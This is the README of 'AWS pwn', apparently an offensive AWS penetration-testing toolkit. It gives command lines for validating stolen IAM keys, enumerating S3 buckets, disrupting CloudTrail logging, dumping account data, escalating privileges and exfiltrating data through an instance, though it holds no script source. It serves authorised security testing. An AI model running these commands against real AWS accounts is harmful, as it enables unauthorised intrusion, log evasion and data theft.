AWS pwn

Summary

This is a collection of horribly written scripts for performing various tasks related to penetration testing AWS. Please don't be sad if it doesn't work for you. It might be that AWS has changed since a given tool was written or it might be that the code sux. Either way, please feel free to contribute.

Most of this junk was written by Daniel Grzelak, but there have been plenty of contributions, most notably from Mike Fuller.

Requirements

pip install -r requirements.txt

Make sure to also set up your AWS credentials in ~/.aws/credentials.

Reconnaissance

Things to do with pre-compromise information gathering.

./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json

Exploitation

Things that will help you gain a foothold in an account.

Stealth

Things that might help you stay hidden after compromising an account.

./disrupt_cloudtrail.py -s

Exploration

Things to help you understand what you've pwned.

./dump_account_data.sh /tmp/

Elevation

Things to help you move around an account and gather different levels of access.

./dump_instance_attributes.py -u -o /tmp/
./dump_cloudformation_stack_descriptions.py -o /tmp/data
./assume_roles.py -o /tmp/out.json
./add_iam_policy.py -u myuser -r myrole -g mygroup
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint

Persistence

Things to help maintain your access to an account.

Exfiltration

Things to help you extract and move data around in AWSy ways.

Miscellanea

Other things that I was either too stupid or too lazy to classify.

To do